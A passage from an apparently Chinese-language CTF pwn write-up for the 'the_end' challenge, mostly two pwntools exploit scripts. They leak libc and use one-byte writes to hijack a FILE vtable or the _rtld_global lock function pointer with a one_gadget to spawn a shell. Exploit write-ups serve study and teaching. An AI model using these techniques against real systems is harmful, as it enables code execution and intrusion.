my_u32 = lambda x: u32(x.ljust(4, '\0'))
# Template constants; the visible remainder of this script does not reference them.
global_max_fast=0x3c67f8
codebase = 0x555555554000
def loginfo(what='',address=0):
    """Log a labelled address through pwntools' `log.info`.

    The message is `what`, the literal '----->' and hex(address), wrapped
    in an ANSI colour escape sequence and the matching reset sequence.
    """
    prefix, suffix = "\033[1;36m", "\033[0m"
    log.info(prefix + what + '----->' + hex(address) + suffix)

'''libc 2.23 x64
0x45216 execve("/bin/sh", rsp+0x30, environ)constraints: rax == NULL
0x4526a execve("/bin/sh", rsp+0x30, environ)constraints: [rsp+0x30] == NULL
0xf02a4 execve("/bin/sh", rsp+0x50, environ)constraints: [rsp+0x50] == NULL
0xf1147 execve("/bin/sh", rsp+0x70, environ)constraints: [rsp+0x70] == NULL
req = dest - old_top - 4*sizeof(long)

'''
# todo here
def writeByte(address,Byte):
    """Send one address/byte pair to the target.

    The address goes out packed with p64(), then `Byte` follows as a
    separate send; each send is followed by a 0.1 s pause.
    """
    for chunk in (p64(address), Byte):
        p.send(chunk)
        sleep(0.1)

# The program prints an address after 'here is a gift '; it is parsed as hex
# and rebased with libc.symbols['sleep'] to obtain the libc base.
p.recvuntil('here is a gift ')
libc_base=int(p.recv(len('0x7f4ec6b9d230')),16)-libc.symbols['sleep']
loginfo('libc_base',libc_base)
'''stdout
stdout_IO_write_ptr=0x3c5648
stdout_vtable_off=0x3c56f8
address_off=0x3c53e0
func_off=0x3c53f8
'''
# libc-relative offsets for the stdin variant. func_off is address_off+0x18,
# i.e. the fourth 8-byte slot counted from address_off.
stdin_IO_write_ptr=0x3c4908
stdin_vtable_off=0x3c49b8
address_off=0x3c53e0
func_off=0x3c53f8

#gdb.attach(p,'brva 0x950')
# Write 1 of 5: one byte at the _IO_write_ptr offset.
writeByte(stdin_IO_write_ptr+libc_base,'\xff')
# Write 2 of 5: replace the second-lowest byte of the vtable pointer with the
# matching byte of libc_base+address_off.
off=address_off+libc_base
off=(off>>8)&0xff
off=chr(off)
writeByte(stdin_vtable_off+libc_base+1,off)
# Writes 3-5: low three bytes of libc_base+0xf1147, least significant first.
one_off=0xf1147+libc_base
one_off1=chr(one_off&0xff)
one_off2=chr((one_off&0xff00)>>8)
one_off3=chr((one_off&0xff0000)>>16)

writeByte(func_off+libc_base,one_off1)
writeByte(func_off+libc_base+1,one_off2)
writeByte(func_off+libc_base+2,one_off3)

p.interactive()

Exploit2

第二种方法真的是让我感受到了函数指针的伟大23333,简直是Control the ptr ,control the world,这些利用都太奇妙了,再就是源码大法好,以后一定要多看看源码

这里是直接修改的_rtld_global._dl_rtld_lock_recursive这个函数指针….甚至只需要改写这个指针的低三个字节就可以了…真的tql,被师傅们强大到,以后菜鸡一定多看看源码

直接放exp吧都没什么好写的了23333

完整exp

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
# -*- coding: utf-8 -*-
from __future__ import print_function
from pwn import *

# Path of the target binary; also used to configure pwntools' context.
binary = './the_end' #binary's name here
context.binary = binary #context here
context.log_level='debug'
pty = process.PTY
# Start the target locally, with PTYs attached to its stdin and stdout.
p = process(binary, aslr = 1, stdin=pty, stdout=pty) #process option here
'''
Host =
Port =
p = remote(Host,Port)
'''
elf = ELF(binary)
libc = elf.libc

# Right-pad the input with NUL bytes to 8 / 4 bytes, then unpack it as an integer.
my_u64 = lambda x: u64(x.ljust(8, '\0'))
my_u32 = lambda x: u32(x.ljust(4, '\0'))
# Template constants; the visible remainder of this script does not reference them.
global_max_fast=0x3c67f8
codebase = 0x555555554000
def loginfo(what='',address=0):
    """Log a labelled address through pwntools' `log.info`.

    The message is `what`, the literal '----->' and hex(address), wrapped
    in an ANSI colour escape sequence and the matching reset sequence.
    """
    prefix, suffix = "\033[1;36m", "\033[0m"
    log.info(prefix + what + '----->' + hex(address) + suffix)

'''libc 2.23 x64
0x45216 execve("/bin/sh", rsp+0x30, environ)constraints: rax == NULL
0x4526a execve("/bin/sh", rsp+0x30, environ)constraints: [rsp+0x30] == NULL
0xf02a4 execve("/bin/sh", rsp+0x50, environ)constraints: [rsp+0x50] == NULL
0xf1147 execve("/bin/sh", rsp+0x70, environ)constraints: [rsp+0x70] == NULL
req = dest - old_top - 4*sizeof(long)
'''
# todo here
def writeByte(address,Byte):
    """Send one address/byte pair to the target.

    The address goes out packed with p64(), then `Byte` follows as a
    separate send; each send is followed by a 0.1 s pause.
    """
    for chunk in (p64(address), Byte):
        p.send(chunk)
        sleep(0.1)

# The program prints an address after 'here is a gift '; it is parsed as hex
# and rebased with libc.symbols['sleep'] to obtain the libc base.
p.recvuntil('here is a gift ')
libc_base=int(p.recv(len('0x7f4ec6b9d230')),16)-libc.symbols['sleep']
loginfo('libc_base',libc_base)

# libc-relative offset of the pointer being overwritten, and the three low
# bytes of libc_base+0xf02a4 that will be written over it.
ptr_off_set=0x5f0f48
one_gadget=0xf02a4+libc_base
off1=one_gadget&0xff
off2=(one_gadget&0xff00)>>8
off3=(one_gadget&0xff0000)>>16
#gdb.attach(p,'brva 0x950')
# The lowest byte is written three times to the same address.
# NOTE(review): presumably the repeats only use up the target's five one-byte
# writes, since just three distinct bytes are needed - confirm.
writeByte(libc_base+ptr_off_set,chr(off1))
writeByte(libc_base+ptr_off_set,chr(off1))
writeByte(libc_base+ptr_off_set,chr(off1))
writeByte(libc_base+ptr_off_set+1,chr(off2))
writeByte(libc_base+ptr_off_set+2,chr(off3))


p.interactive()